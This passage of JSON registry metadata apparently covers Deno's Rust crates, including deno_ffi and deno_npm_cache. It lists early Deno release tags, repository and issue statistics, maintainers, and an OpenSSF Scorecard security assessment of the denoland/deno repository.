pendency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-31T13:36:09.895Z","dependent_packages_count":8,"downloads":565219,"downloads_period":"total","dependent_repos_count":26,"rankings":{"downloads":5.857014657493269,"dependent_repos_count":5.415086861253823,"dependent_packages_count":4.22818591153196,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":6.773817180979163,"average":3.722321852399851},"purl":"pkg:cargo/deno_ffi","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_ffi","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_ffi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_ffi/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-31T04:05:42.345Z","issues_count":6636,"pull_requests_count":9651,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":583,"issue_authors_count":2480,"avg_comments_per_issue":2.5051235684147075,"avg_comments_per_pull_request":0.7197181639208372,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1410952.7079646017,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":226,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":186,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.232488822652757,"past_year_avg_comments_per_pull_request":1.1123128119800334,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ffi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ffi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ffi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ffi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ffi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ffi/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:26.036Z","updated_at":"2022-11-07T18:29:26.036Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:25.617Z","updated_at":"2023-07-18T22:41:25.617Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11105132,"name":"deno_npm_cache","ecosystem":"cargo","description":"Helpers for downloading and caching npm dependencies for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":78,"first_release_published_at":"2024-12-03T00:17:02.431Z","latest_release_published_at":"2026-08-27T15:22:39.932Z","latest_release_number":"0.77.0","last_synced_at":"2026-09-07T22:56:29.841Z","created_at":"2024-12-03T00:32:39.543Z","updated_at":"2026-09-07T22:56:29.841Z","registry_url":"https://crates.io/crates/deno_npm_cache/","install_command":"cargo install deno_npm_cache","documentation_url":"https://docs.rs/deno_npm_cache/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 